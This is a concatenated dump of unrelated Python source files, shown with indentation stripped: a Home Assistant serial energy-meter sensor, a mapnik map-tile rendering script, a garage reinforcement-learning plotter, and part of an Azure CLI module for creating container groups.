def __init__(self, sensor_name, port):
_LOGGER.debug("Init")
self._port = port
self._name = sensor_name
self._baudrate = 115200
self._timeout = 1
self._icon = 'mdi:flash'
self._unit_of_measurement = "kWh"
self._serial_thread = None
self._serial_thread_isEnabled = True
self._state = None
self._data = {}
self._data[ATTR_DEVICE_MAC_ID] = None
self._data[ATTR_METER_MAC_ID] = None
self._data[ATTR_TEIR] = None
self._data[ATTR_PRICE] = None
@property
def name(self):
return self._name
@property
def device_state_attributes(self):
return {
ATTR_DEVICE_MAC_ID: self._data.get(ATTR_DEVICE_MAC_ID),
ATTR_METER_MAC_ID: self._data.get(ATTR_METER_MAC_ID),
ATTR_TEIR: self._data.get(ATTR_TEIR),
ATTR_PRICE: self._data.get(ATTR_PRICE),
}
@property
def icon(self):
return self._icon
@property
def state(self):
return self._state
@property
def should_poll(self):
return False
@property
def unit_of_measurement(self):
return self._unit_of_measurement
async def async_added_to_hass(self):
_LOGGER.debug("Thread Start")
self._serial_thread = Thread(target = self.serial_read, args = (self._port, self._baudrate, self._timeout))
self._serial_thread.start()
def serial_read(self, portIN, baudrateIN, timeoutIN, **kwargs):
_LOGGER.debug("Thread Starting")
import serial, time
import xml.etree.ElementTree as xmlDecoder
reader = None
while reader == None:
try:
reader = serial.Serial(portIN, baudrateIN, timeout=timeoutIN)
except:
_LOGGER.error("Failed to open %s. Retrying in 5s...", portIN)
time.sleep(5.0)
_LOGGER.debug("Begining Loop")
while self._serial_thread_isEnabled:
if (reader.in_waiting > 0):
#_LOGGER.debug("Data RX")
msgStr = reader.read(reader.in_waiting).decode()
if msgStr != [] and msgStr[0] == '<':
try:
xmlTree = xmlDecoder.fromstring(msgStr)
except:
continue
if xmlTree.tag == 'InstantaneousDemand':
demand = int(xmlTree.find('Demand').text, 16)
multiplier = int(xmlTree.find('Multiplier').text, 16)
divisor = int(xmlTree.find('Divisor').text, 16)
digitsRight = int(xmlTree.find('DigitsRight').text, 16)
if(divisor != 0):
self._state = round(((demand * multiplier) / divisor), digitsRight)
self._data[ATTR_DEVICE_MAC_ID] = xmlTree.find('DeviceMacId').text
self._data[ATTR_METER_MAC_ID] = xmlTree.find('MeterMacId').text
self.async_schedule_update_ha_state()
_LOGGER.debug("InstantaneousDemand: %s", self._state)
elif xmlTree.tag == 'PriceCluster':
priceRaw = int(xmlTree.find('Price').text, 16)
trailingDigits = int(xmlTree.find('TrailingDigits').text, 16)
self._data[ATTR_PRICE] = priceRaw / pow(10, trailingDigits)
self._data[ATTR_TEIR] = int(xmlTree.find('Tier').text, 16)
_LOGGER.debug("PriceCluster: %s", self._data[ATTR_PRICE])
else:
time.sleep(0.5)
reader.close()
async def stop_serial_read(self):
self._serial_thread_isEnabled = False
|
generate_tiles.py
|
#!/usr/bin/env python
from math import pi,cos,sin,log,exp,atan
from subprocess import call
import sys, os
from Queue import Queue
from pandas import DataFrame
import xml.etree.ElementTree as ET
import multiprocessing
import threading
import glob
import json
import os.path
#try:
# import mapnik2 as mapnik
#except:
# import mapnik
import mapnik
DEG_TO_RAD = pi/180
RAD_TO_DEG = 180/pi
# Default number of rendering threads to spawn, should be roughly equal to number of CPU cores available
#NUM_THREADS = 4
NUM_THREADS =multiprocessing.cpu_count()
def minmax (a,b,c):
a = max(a,b)
a = min(a,c)
return a
class GoogleProjection:
def __init__(self,levels=18):
self.Bc = []
self.Cc = []
self.zc = []
self.Ac = []
c = 256
for d in range(0,levels):
e = c/2;
self.Bc.append(c/360.0)
self.Cc.append(c/(2 * pi))
self.zc.append((e,e))
self.Ac.append(c)
c *= 2
def fromLLtoPixel(self,ll,zoom):
d = self.zc[zoom]
e = round(d[0] + ll[0] * self.Bc[zoom])
f = minmax(sin(DEG_TO_RAD * ll[1]),-0.9999,0.9999)
g = round(d[1] + 0.5*log((1+f)/(1-f))*-self.Cc[zoom])
return (e,g)
def fromPixelToLL(self,px,zoom):
e = self.zc[zoom]
f = (px[0] - e[0])/self.Bc[zoom]
g = (px[1] - e[1])/-self.Cc[zoom]
h = RAD_TO_DEG * ( 2 * atan(exp(g)) - 0.5 * pi)
return (f,h)
class RenderThread:
def __init__(self, tile_dir, mapfile, q, printLock, maxZoom):
self.tile_dir = tile_dir
self.q = q
self.m = mapnik.Map(256, 256)
self.printLock = printLock
# Load style XML
mapnik.load_map(self.m, mapfile, True)
# Obtain <Map> projection
self.prj = mapnik.Projection(self.m.srs)
# Projects between tile pixel co-ordinates and LatLong (EPSG:4326)
self.tileproj = GoogleProjection(maxZoom+1)
def render_tile(self, tile_uri, x, y, z):
# Calculate pixel positions of bottom-left & top-right
p0 = (x * 256, (y + 1) * 256)
p1 = ((x + 1) * 256, y * 256)
# Convert to LatLong (EPSG:4326)
l0 = self.tileproj.fromPixelToLL(p0, z);
l1 = self.tileproj.fromPixelToLL(p1, z);
# Convert to map projection (e.g. mercator co-ords EPSG:900913)
c0 = self.prj.forward(mapnik.Coord(l0[0],l0[1]))
c1 = self.prj.forward(mapnik.Coord(l1[0],l1[1]))
# Bounding box for the tile
if hasattr(mapnik,'mapnik_version') and mapnik.mapnik_version() >= 800:
bbox = mapnik.Box2d(c0.x,c0.y, c1.x,c1.y)
else:
bbox = mapnik.Envelope(c0.x,c0.y, c1.x,c1.y)
render_size = 256
self.m.resize(render_size, render_size)
self.m.zoom_to_box(bbox)
if(self.m.buffer_size < 128):
self.m.buffer_size = 128
# Render image with default Agg renderer
im = mapnik.Image(render_size, render_size)
mapnik.render(self.m, im)
im.save(tile_uri, 'png256')
def loop(self):
while True:
#Fetch a tile from the queue and render it
r = self.q.get()
if (r == None):
self.q.task_done()
break
else:
(name, tile_uri, x, y, z) = r
exists= ""
if os.path.isfile(tile_uri):
exists= "exists"
else:
self.render_tile(tile_uri, x, y, z)
bytes=os.stat(tile_uri)[6]
empty= ''
if bytes == 103:
empty = " Empty Tile "
self.printLock.acquire()
print name, ":", z, x, y, exists, empty
self.printLock.release()
self.q.task_done()
def render_tiles(bbox, mapfile, tile_dir, minZoom=1,maxZoom=18, name="unknown", num_threads=NUM_THREADS, tms_scheme=False):
print "render_tiles(",bbox, mapfile, tile_dir, minZoom,maxZoom, name,")"
# Launch rendering threads
queue = Queue(32)
printLock = threading.Lock()
renderers = {}
for i in range(num_threads):
renderer = RenderThread(tile_dir, mapfile, queue, printLock, maxZoom)
render_thread = threading.Thread(target=renderer.loop)
render_thread.start()
#print "Started render thread %s" % render_thread.getName()
renderers[i] = render_thread
if not os.path.isdir(tile_dir):
os.mkdir(tile_dir)
gprj = GoogleProjection(maxZoom+1)
ll0 = (bbox[0],bbox[3])
ll1 = (bbox[2],bbox[1])
for z in range(minZoom,maxZoom + 1):
px0 = gprj.fromLLtoPixel(ll0,z)
px1 = gprj.fromLLtoPixel(ll1,z)
# check if we have directories in place
zoom = "%s" % z
if not os.path.isdir(tile_dir + zoom):
os.mkdir(tile_dir + zoom)
for x in range(int(px0[0]/256.0),int(px1[0]/256.0)+1):
# Validate x co-ordinate
if (x < 0) or (x >= 2**z):
continue
# check if we have directories in place
str_x = "%s" % x
if not os.path.isdir(tile_dir + zoom + '/' + str_x):
os.mkdir(tile_dir + zoom + '/' + str_x)
for y in range(int(px0[1]/256.0),int(px1[1]/256.0)+1):
# Validate x co-ordinate
if (y < 0) or (y >= 2**z):
continue
# flip y to match OSGEO TMS spec
if tms_scheme:
str_y = "%s" % ((2**z-1) - y)
else:
str_y = "%s" % y
tile_uri = tile_dir + zoom + '/' + str_x + '/' + str_y + '.png'
# Submit tile to be rendered into the queue
t = (name, tile_uri, x, y, z)
try:
queue.put(t)
except KeyboardInterrupt:
raise SystemExit("Ctrl-c detected, exiting...")
# Signal render threads to exit by sending empty request to queue
for i in range(num_threads):
queue.put(None)
# wait for pending rendering jobs to complete
queue.join()
for i in range(num_threads):
renderers[i].join()
if __name__ == "__main__":
path=sys.argv[1] #first argument, either mapnik xml file or directory of files
tileDir=sys.argv[2]
kwargs = dict(x.split('=', 1) for x in sys.argv[3:]) #make dictionary from variable number of arguments passed to script (after files directory)
args={'minzoom':None,'maxzoom':None} #default arguments for converter function
paths=[]
for key, value in kwargs.iteritems():
if key=='minzoom':
args['minzoom']=value
if key=='maxzoom':
args['maxzoom']=value
split=path.rsplit('.')
if split[len(split)-1]=='xml': paths.append(path)
if '/' in split[len(split)-1]: #if path is making reference to a directory
if path[len(path)-1]!='/': #if '/' is not included as last characther in the path
path=path+'/'
for filename in glob.glob(os.path.join(path, '*.xml')): paths.append(filename) #get list of mapnik xml files
else:
print 'not an xml file nor directory, quitting script'
sys.exit()
#minZoom=int(sys.argv[3])
#maxZoom=int(sys.argv[4])
target=len(paths)
count=1
for mapfile in paths: #loop over list of mapnik files
tile_dir=tileDir #initialize internal variable of folder for tiles, with copy from one provided in script parameters
outputPath=[] #extra output path to use in case of multiple files
print 'processing file: '+mapfile+' number: '+str(count)+' out of '+str(target)+' files'
tree = ET.parse(mapfile) #read mapnik xml to find bounding box parameters
root = tree.getroot()
params=root.find('Parameters')
bbox=[]
for i in params:
if i.attrib['name']=='bounds':
bbox=[float(n) for n in i.text.split(',')]
if i.attrib['name']=='minzoom' and args['minzoom']==None: #if zoom is specified in mapfile
args['minzoom']==i.text
if i.attrib['name']=='maxzoom' and args['maxzoom']==None:
args['maxzoom']==i.text
if args['minzoom']==None: args['minzoom']=0 #if zooms were not specified in file, use defaults
if args['maxzoom']==None: args['maxzoom']=14
bbox=tuple(bbox) #make tuple of bounding box
layer=root.find('Layer')
ds=layer.find('Datasource')#find datasource
for i in ds:
if i.attrib['name']=='file':
datasource=i.text #path to datasource shapefile
datasourcePATH=datasource.rsplit('/',1)[0] #path to datasource (without the file)
shapeNAME=datasource.rsplit('/',1)[1].rsplit('.',1)[0] #name (just the name, without extension) of the shapefile
if target>1: #create folder for output tiles (which will contain other layer's subfolders with tiles)
if tile_dir[len(tile_dir)-1]=='/': #if las '/' character was included in path
tile_dir=tile_dir+shapeNAME+'/' #name subfolder according to name of shapefile
else:
tile_dir=tile_dir+'/'+shapeNAME+'/' #name subfolder according to name of shapefile
if not os.path.exists(tile_dir):
os.makedirs(tile_dir)
metadataFiles=[]
for filename in glob.glob(os.path.join(datasourcePATH, '*metadata.json')): metadataFiles.append(filename)
if len(metadataFiles)>0: #write to json metadata if exists (add bounding box parameters)
for mf in metadataFiles:
if shapeNAME in mf.rsplit('/',1)[1]: #IF THE NAME OF THE SHAPEFILE IS IN THE FILENAME (without the path)
with open(mf) as data_file:
metaData = json.load(data_file)
metaData['bounds']=[x for x in bbox] #add the extents
with open(tile_dir+shapeNAME+'_metadata.json', 'w') as fp: json.dump(metaData,fp)
if not os.path.isfile(tile_dir+shapeNAME+'_metadata.json'): #if file didn't exist, create it
metaData={} #create json with bounding box
metaData['bounds']=[x for x in bbox]
with open(tile_dir+shapeNAME+'_metadata.json', 'w') as fp: json.dump(metaData,fp) #create bounding box json
render_tiles(bbox, mapfile, tile_dir, int(args['minzoom']), int(args['maxzoom']))
count+=1
#env_file=mapfile.rsplit('.',1)[0] #take file styles extension
#env_file=env_file+'_ext.csv' #add the extents extension for reading envelope file
#env=DataFrame.from_csv(env_file)
#bbox=(env.ix['lon_1',0],env.ix['lat_2',0],env.ix['lon_2',0],env.ix['lat_1',0])
#bbox=(11.4,48.07, 11.7,48.22)
#home = os.environ['HOME']
#try:
# mapfile = os.environ['MAPNIK_MAP_FILE']
#except KeyError:
# mapfile = home + "/svn.openstreetmap.org/applications/rendering/mapnik/osm-local.xml"
#try:
# tile_dir = os.environ['MAPNIK_TILE_DIR']
#except KeyError:
# tile_dir = home + "/osm/tiles/"
#if not tile_dir.endswith('/'):
# tile_dir = tile_dir + '/'
#-------------------------------------------------------------------------
#
# Change the following for different bounding boxes and zoom levels
#
# Start with an overview
# World
#bbox = (-180.0,-90.0, 180.0,90.0)
#render_tiles(bbox, mapfile, tile_dir, 0, 5, "World")
#minZoom = 10
#maxZoom = 16
#bbox = (-2, 50.0,1.0,52.0)
#render_tiles(bbox, mapfile, tile_dir, minZoom, maxZoom)
# Muenchen
# bbox = (11.4,48.07, 11.7,48.22)
#render_tiles(bbox, mapfile, tile_dir, 1, 12 , "Muenchen")
# Muenchen+
#bbox = (11.3,48.01, 12.15,48.44)
#render_tiles(bbox, mapfile, tile_dir, 7, 12 , "Muenchen+")
# Muenchen++
#bbox = (10.92,47.7, 12.24,48.61)
#render_tiles(bbox, mapfile, tile_dir, 7, 12 , "Muenchen++")
# Nuernberg
#bbox=(10.903198,49.560441,49.633534,11.038085)
#render_tiles(bbox, mapfile, tile_dir, 10, 16, "Nuernberg")
# Karlsruhe
#bbox=(8.179113,48.933617,8.489252,49.081707)
#render_tiles(bbox, mapfile, tile_dir, 10, 16, "Karlsruhe")
# Karlsruhe+
#bbox = (8.3,48.95,8.5,49.05)
#render_tiles(bbox, mapfile, tile_dir, 1, 16, "Karlsruhe+")
# Augsburg
#bbox = (8.3,48.95,8.5,49.05)
#render_tiles(bbox, mapfile, tile_dir, 1, 16, "Augsburg")
# Augsburg+
#bbox=(10.773251,48.369594,10.883834,48.438577)
#render_tiles(bbox, mapfile, tile_dir, 10, 14, "Augsburg+")
# Europe+
#bbox = (1.0,10.0, 20.6,50.0)
#render_tiles(bbox, mapfile, tile_dir, 1, 11 , "Europe+")
|
plotter.py
|
import atexit
from collections import namedtuple
from enum import Enum
from multiprocessing import JoinableQueue
from multiprocessing import Process
import platform
from threading import Thread
import numpy as np
from garage.sampler.utils import rollout
__all__ = ['Plotter']
class Op(Enum):
STOP = 0
UPDATE = 1
DEMO = 2
Message = namedtuple('Message', ['op', 'args', 'kwargs'])
class Plotter:
# Static variable used to disable the plotter
enable = True
# List containing all plotters instantiated in the process
__plotters = []
def __init__(self, standalone=False):
Plotter.__plotters.append(self)
self._process = None
self._queue = None
def _worker_start(self):
env = None
policy = None
max_length = None
initial_rollout = True
try:
# Each iteration will process ALL messages currently in the
# queue
while True:
msgs = {}
# If true, block and yield processor
if initial_rollout:
msg = self._queue.get()
msgs[msg.op] = msg
# Only fetch the last message of each type
while not self._queue.empty():
msg = self._queue.get()
msgs[msg.op] = msg
else:
# Only fetch the last message of each type
while not self._queue.empty():
msg = self._queue.get_nowait()
msgs[msg.op] = msg
if Op.STOP in msgs:
break
elif Op.UPDATE in msgs:
env, policy = msgs[Op.UPDATE].args
elif Op.DEMO in msgs:
param_values, max_length = msgs[Op.DEMO].args
policy.set_param_values(param_values)
initial_rollout = False
rollout(
env,
policy,
max_path_length=max_length,
animated=True,
speedup=5)
else:
if max_length:
rollout(
env,
policy,
max_path_length=max_length,
animated=True,
speedup=5)
except KeyboardInterrupt:
pass
def close(self):
if not Plotter.enable:
return
if self._process and self._process.is_alive():
while not self._queue.empty():
self._queue.get()
self._queue.task_done()
self._queue.put(Message(op=Op.STOP, args=None, kwargs=None))
self._queue.close()
self._process.join()
@staticmethod
def disable():
"""Disable all instances of the Plotter class."""
Plotter.enable = False
@staticmethod
def get_plotters():
return Plotter.__plotters
def init_worker(self):
if not Plotter.enable:
return
self._queue = JoinableQueue()
if ('Darwin' in platform.platform()):
self._process = Thread(target=self._worker_start)
else:
self._process = Process(target=self._worker_start)
self._process.daemon = True
self._process.start()
atexit.register(self.close)
def init_plot(self, env, policy):
if not Plotter.enable:
return
if not (self._process and self._queue):
self.init_worker()
# Needed in order to draw glfw window on the main thread
if ('Darwin' in platform.platform()):
rollout(
env, policy, max_path_length=np.inf, animated=True, speedup=5)
self._queue.put(Message(op=Op.UPDATE, args=(env, policy), kwargs=None))
def update_plot(self, policy, max_length=np.inf):
if not Plotter.enable:
return
self._queue.put(
Message(
op=Op.DEMO,
args=(policy.get_param_values(), max_length),
kwargs=None))
|
custom.py
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# pylint: disable=too-few-public-methods,no-self-use,too-many-locals,line-too-long,unused-argument
import errno
try:
import msvcrt
except ImportError:
# Not supported for Linux machines.
pass
import platform
import select
import shlex
import signal
import sys
import threading
import time
try:
import termios
import tty
except ImportError:
# Not supported for Windows machines.
pass
import websocket
import yaml
from knack.log import get_logger
from knack.prompting import prompt_pass, prompt, NoTTYException
from knack.util import CLIError
from azure.mgmt.containerinstance.models import (AzureFileVolume, Container, ContainerGroup, ContainerGroupNetworkProtocol,
ContainerPort, ImageRegistryCredential, IpAddress, Port, ResourceRequests,
ResourceRequirements, Volume, VolumeMount, ContainerExecRequestTerminalSize,
GitRepoVolume, LogAnalytics, ContainerGroupDiagnostics, ContainerGroupNetworkProfile,
ContainerGroupIpAddressType, ResourceIdentityType, ContainerGroupIdentity)
from azure.cli.core.util import sdk_no_wait
from ._client_factory import (cf_container_groups, cf_container, cf_log_analytics, cf_resource, cf_network)
logger = get_logger(__name__)
WINDOWS_NAME = 'Windows'
SERVER_DELIMITER = '.'
ACR_SERVER_DELIMITER = '.azurecr.io'
AZURE_FILE_VOLUME_NAME = 'azurefile'
SECRETS_VOLUME_NAME = 'secrets'
GITREPO_VOLUME_NAME = 'gitrepo'
MSI_LOCAL_ID = '[system]'
def list_containers(client, resource_group_name=None):
"""List all container groups in a resource group. """
if resource_group_name is None:
return client.list()
return client.list_by_resource_group(resource_group_name)
def get_container(client, resource_group_name, name):
"""Show details of a container group. """
return client.get(resource_group_name, name)
def delete_container(client, resource_group_name, name, **kwargs):
"""Delete a container group. """
return client.delete(resource_group_name, name)
# pylint: disable=too-many-statements
def create_container(cmd,
resource_group_name,
name=None,
image=None,
location=None,
cpu=1,
memory=1.5,
restart_policy='Always',
ports=None,
protocol=None,
os_type='Linux',
ip_address=None,
dns_name_label=None,
command_line=None,
environment_variables=None,
secure_environment_variables=None,
registry_login_server=None,
registry_username=None,
registry_password=None,
azure_file_volume_share_name=None,
azure_file_volume_account_name=None,
azure_file_volume_account_key=None,
azure_file_volume_mount_path=None,
log_analytics_workspace=None,
log_analytics_workspace_key=None,
vnet=None,
vnet_name=None,
vnet_address_prefix='10.0.0.0/16',
subnet=None,
subnet_address_prefix='10.0.0.0/24',
network_profile=None,
gitrepo_url=None,
gitrepo_dir='.',
gitrepo_revision=None,
gitrepo_mount_path=None,
secrets=None,
secrets_mount_path=None,
file=None,
assign_identity=None,
identity_scope=None,
identity_role='Contributor',
no_wait=False):
"""Create a container group. """
if file:
return _create_update_from_file(cmd.cli_ctx, resource_group_name, name, location, file, no_wait)
if not name:
raise CLIError("error: the --name/-n argument is required unless specified with a passed in file.")
if not image:
raise CLIError("error: the --image argument is required unless specified with a passed in file.")
ports = ports or [80]
protocol = protocol or ContainerGroupNetworkProtocol.tcp
container_resource_requirements = _create_resource_requirements(cpu=cpu, memory=memory)
image_registry_credentials = _create_image_registry_credentials(registry_login_server=registry_login_server,
registry_username=registry_username,
registry_password=registry_password,
image=image)
command = shlex.split(command_line) if command_line else None
volumes = []
mounts = []
azure_file_volume = _create_azure_file_volume(azure_file_volume_share_name=azure_file_volume_share_name,
azure_file_volume_account_name=azure_file_volume_account_name,
azure_file_volume_account_key=azure_file_volume_account_key)
azure_file_volume_mount = _create_azure_file_volume_mount(azure_file_volume=azure_file_volume,
azure_file_volume_mount_path=azure_file_volume_mount_path)
if azure_file_volume:
volumes.append(azure_file_volume)
mounts.append(azure_file_volume_mount)
secrets_volume = _create_secrets_volume(secrets)
secrets_volume_mount = _create_secrets_volume_mount(secrets_volume=secrets_volume,
secrets_mount_path=secrets_mount_path)
if secrets_volume:
volumes.append(secrets_volume)
mounts.append(secrets_volume_mount)
diagnostics = None
tags = {}
if log_analytics_workspace and log_analytics_workspace_key:
log_analytics = LogAnalytics(
workspace_id=log_analytics_workspace, workspace_key=log_analytics_workspace_key)
diagnostics = ContainerGroupDiagnostics(
log_analytics=log_analytics
)
elif log_analytics_workspace and not log_analytics_workspace_key:
diagnostics, tags = _get_diagnostics_from_workspace(
cmd.cli_ctx, log_analytics_workspace)
if not diagnostics:
raise CLIError('Log Analytics workspace "' + log_analytics_workspace + '" not found.')
elif not log_analytics_workspace and log_analytics_workspace_key:
raise CLIError('"--log-analytics-workspace-key" requires "--log-analytics-workspace".')
gitrepo_volume = _create_gitrepo_volume(gitrepo_url=gitrepo_url, gitrepo_dir=gitrepo_dir, gitrepo_revision=gitrepo_revision)
gitrepo_volume_mount = _create_gitrepo_volume_mount(gitrepo_volume=gitrepo_volume, gitrepo_mount_path=gitrepo_mount_path)
if gitrepo_volume:
volumes.append(gitrepo_volume)
mounts.append(gitrepo_volume_mount)
# Concatenate secure and standard environment variables
if environment_variables and secure_environment_variables:
environment_variables = environment_variables + secure_environment_variables
else:
environment_variables = environment_variables or secure_environment_variables
identity = None
if assign_identity is not None:
identity = _build_identities_info(assign_identity)
# Set up VNET, subnet and network profile if needed
if subnet and not network_profile:
network_profile = _get_vnet_network_profile(cmd, location, resource_group_name, vnet, vnet_address_prefix, subnet, subnet_address_prefix)
cg_network_profile = None
if network_profile:
cg_network_profile = ContainerGroupNetworkProfile(id=network_profile)
cgroup_ip_address = _create_ip_address(ip_address, ports, protocol, dns_name_label, network_profile)
container = Container(name=name,
image=image,
resources=container_resource_requirements,
command=command,
ports=[ContainerPort(
port=p, protocol=protocol) for p in ports] if cgroup_ip_address else None,
environment_variables=environment_variables,
volume_mounts=mounts or None)
cgroup = ContainerGroup(location=location,
identity=identity,
containers=[container],
os_type=os_type,
restart_policy=restart_policy,
ip_address=cgroup_ip_address,
image_registry_credentials=image_registry_credentials,
volumes=volumes or None,
network_profile=cg_network_profile,
diagnostics=diagnostics,
tags=tags)
container_group_client = cf_container_groups(cmd.cli_ctx)
lro = sdk_no_wait(no_wait, container_group_client.create_or_update, resource_group_name,
name, cgroup)
if assign_identity is not None and identity_scope:
from azure.cli.core.commands.arm import assign_identity
cg = container_group_client.get(resource_group_name, name)
assign_identity(cmd.cli_ctx, lambda: cg, lambda cg: cg, identity_role, identity_scope)
return lro
def _build_identities_info(identities):
identities = identities or []
identity_type = ResourceIdentityType.none
if not identities or MSI_LOCAL_ID in identities:
identity_type = ResourceIdentityType.system_assigned
external_identities = [x for x in identities if x != MSI_LOCAL_ID]
if external_identities and identity_type == ResourceIdentityType.system_assigned:
identity_type = ResourceIdentityType.system_assigned_user_assigned
elif external_identities:
identity_type = ResourceIdentityType.user_assigned
identity = ContainerGroupIdentity(type=identity_type)
if external_identities:
identity.user_assigned_identities = {e: {} for e in external_identities}
return identity
def _get_resource(client, resource_group_name, *subresources):
from msrestazure.azure_exceptions import CloudError
try:
resource = client.get(resource_group_name, *subresources)
return resource
except CloudError as ex:
if ex.error.error == "NotFound" or ex.error.error == "ResourceNotFound":
return None
else:
raise
def _get_vnet_network_profile(cmd, location, resource_group_name, vnet, vnet_address_prefix, subnet, subnet_address_prefix):
from azure.cli.core.profiles import ResourceType
from msrestazure.tools import parse_resource_id, is_valid_resource_id
aci_delegation_service_name = "Microsoft.ContainerInstance/containerGroups"
Delegation = cmd.get_models('Delegation', resource_type=ResourceType.MGMT_NETWORK)
aci_delegation = Delegation(
name=aci_delegation_service_name,
service_name=aci_delegation_service_name
)
ncf = cf_network(cmd.cli_ctx)
vnet_name = vnet
subnet_name = subnet
if is_valid_resource_id(subnet):
parsed_subnet_id = parse_resource_id(subnet)
subnet_name = parsed_subnet_id['resource_name']
vnet_name = parsed_subnet_id['name']
resource_group_name = parsed_subnet_id['resource_group']
elif is_valid_resource_id(vnet):
parsed_vnet_id = parse_resource_id(vnet)
vnet_name = parsed_vnet_id['resource_name']
resource_group_name = parsed_vnet_id['resource_group']
default_network_profile_name = "aci-network-profile-{}-{}".format(vnet_name, subnet_name)
subnet = _get_resource(ncf.subnets, resource_group_name, vnet_name, subnet_name)
# For an existing subnet, validate and add delegation if needed
if subnet:
logger.info('Using existing subnet "%s" in resource group "%s"', subnet.name, resource_group_name)
for sal in (subnet.service_association_links or []):
if sal.linked_resource_type != aci_delegation_service_name:
raise CLIError("Can not use subnet with existing service association links other than {}.".format(aci_delegation_service_name))
if not subnet.delegations:
logger.info('Adding ACI delegation to the existing subnet.')
subnet.delegations = [aci_delegation]
subnet = ncf.subnets.create_or_update(resource_group_name, vnet_name, subnet_name, subnet).result()
else:
for delegation in subnet.delegations:
if delegation.service_name != aci_delegation_service_name:
raise CLIError("Can not use subnet with existing delegations other than {}".format(aci_delegation_service_name))
network_profile = _get_resource(ncf.network_profiles, resource_group_name, default_network_profile_name)
if network_profile:
logger.info('Using existing network profile "%s"', default_network_profile_name)
return network_profile.id
# Create new subnet and Vnet if not exists
else:
Subnet, VirtualNetwork, AddressSpace = cmd.get_models('Subnet', 'VirtualNetwork',
'AddressSpace', resource_type=ResourceType.MGMT_NETWORK)
vnet = _get_resource(ncf.virtual_networks, resource_group_name, vnet_name)
if not vnet:
logger.info('Creating new vnet "%s" in resource group "%s"', vnet_name, resource_group_name)
ncf.virtual_networks.create_or_update(resource_group_name,
vnet_name,
VirtualNetwork(name=vnet_name,
location=location,
address_space=AddressSpace(address_prefixes=[vnet_address_prefix])))
subnet = Subnet(
name=subnet_name,
location=location,
address_prefix=subnet_address_prefix,
delegations=[aci_delegation])
logger.info('Creating new subnet "%s" in resource group "%s"', subnet_name, resource_group_name)
subnet = ncf.subnets.create_or_update(resource_group_name, vnet_name, subnet_name, subnet).result()
NetworkProfile, ContainerNetworkInterfaceConfiguration, IPConfigurationProfile = cmd.get_models('NetworkProfile',
'ContainerNetworkInterfaceConfiguration',
'IPConfigurationProfile',
resource_type=ResourceType.MGMT_NETWORK)
# In all cases, create the network profile with aci NIC
network_profile = NetworkProfile(
name=default_network_profile_name,
location=location,
container_network_interface_configurations=[ContainerNetworkInterfaceConfiguration(
name="eth0",
ip_configurations=[IPConfigurationProfile(
name="ipconfigprofile",
subnet=subnet
)]
)]
)
logger.info('Creating network profile "%s" in resource group "%s"', default_network_profile_name, resource_group_name)
network_profile = ncf.network_profiles.create_or_update(resource_group_name, default_network_profile_name, network_profile).result()
return network_profile.id
def _get_diagnostics_from_workspace(cli_ctx, log_analytics_workspace):
from msrestazure.tools import parse_resource_id
log_analytics_client = cf_log_analytics(cli_ctx)
for workspace in log_analytics_client.list():
if log_analytics_workspace == workspace.name or log_analytics_workspace == workspace.customer_id:
keys = log_analytics_client.get_shared_keys(
parse_resource_id(workspace.id)['resource_group'], workspace.name)
log_analytics = LogAnalytics(
workspace_id=workspace.customer_id, workspace_key=keys.primary_shared_key)
diagnostics = ContainerGroupDiagnostics(
log_analytics=log_analytics)
return (diagnostics, {'oms-resource-link': workspace.id})
return None, {}
def _create_update_from_file(cli_ctx, resource_group_name, name, location, file, no_wait):
resource_client = cf_resource(cli_ctx)
container_group_client = cf_container_groups(cli_ctx)
cg_defintion = None
try:
with open(file, 'r') as f:
cg_defintion = yaml.safe_load(f)
except OSError: # FileNotFoundError introduced in Python 3
raise CLIError("No such file or directory: " + file)
except yaml.YAMLError as e:
raise CLIError("Error while parsing yaml file:\n\n" + str(e))
# Validate names match if both are provided
if name and cg_defintion.get('name', None):
if name != cg_defintion.get('name', None):
raise CLIError("The name parameter and name from yaml definition must match.")
else:
# Validate at least one name is provided
name = name or cg_defintion.get('name', None)
if cg_defintion.get('name', None) is None and not name:
raise CLIError("The name of the container group is required")
cg_defintion['name'] = name
location = location or cg_defintion.get('location', None)
if not location:
location = resource_client.resource_groups.get(resource_group_name).location
cg_defintion['location'] = location
api_version = cg_defintion.get('apiVersion', None) or container_group_client.api_version
return sdk_no_wait(no_wait,
resource_client.resources.create_or_update,
resource_group_name,
"Microsoft.ContainerInstance",
'',
"containerGroups",
name,
api_version,
cg_defintion)
# pylint: disable=inconsistent-return-statements
def _create_resource_requirements(cpu, memory):
"""Create resource requirements. """
if cpu or memory:
container_resource_requests = ResourceRequests(memory_in_gb=memory, cpu=cpu)
return ResourceRequirements(requests=container_resource_requests)
def _create_image_registry_credentials(registry_login_server, registry_username, registry_password, image):
"""Create image registry credentials. """
image_registry_credentials = None
if registry_login_server:
if not registry_username:
raise CLIError('Please specify --registry-username in order to use custom image registry.')
if not registry_password:
try:
registry_password = prompt_pass(msg='Image registry password: ')
except NoTTYException:
raise CLIError('Please specify --registry-password in order to use custom image registry.')
image_registry_credentials = [ImageRegistryCredential(server=registry_login_server,
username=registry_username,
password=registry_password)]
elif ACR_SERVER_DELIMITER in image.split("/")[0]:
if not registry_username:
try:
registry_username = prompt(msg='Image registry username: ')
except NoTTYException:
raise CLIError('Please specify --registry-username in order to use Azure Container Registry.')
if not registry_password:
try:
registry_password = prompt_pass(msg='Image registry password: ')
except NoTTYException:
raise CLIError('Please specify --registry-password in order to use Azure Container Registry.')
acr_server = image.split("/")[0] if image.split("/") else None
if acr_server:
image_registry_credentials = [ImageRegistryCredential(server=acr_server,
username=registry_username,
password=registry_password)]
elif registry_username and registry_password and SERVER_DELIMITER in image.split("/")[0]:
login_server = image.split("/")[0] if image.split("/") else None
if login_server:
image_registry_credentials = [ImageRegistryCredential(server=login_server,
username=registry_username,
password=registry_password)]
else:
raise CLIError('Failed to parse login server from image name; please explicitly specify --registry-server.')
return image_registry_credentials
def _create_azure_file_volume(azure_file_volume_share_name, azure_file_volume_account_name, azure_file_volume_account_key):
"""Create Azure File volume. """
azure_file_volume = None
if azure_file_volume_share_name:
if not azure_file_volume_account_name:
raise CLIError('Please specify --azure-file-volume-account-name in order to use Azure File volume.')
if not azure_file_volume_account_key:
try:
azure_file_volume_account_key = prompt_pass(msg='Azure File storage account key: ')
except NoTTYException:
raise CLIError('Please specify --azure-file-volume-account-key in order to use Azure File volume.')
azure_file_volume = AzureFileVolume(share_name=azure_file_volume_share_name,
storage_account_name=azure_file_volume_account_name,
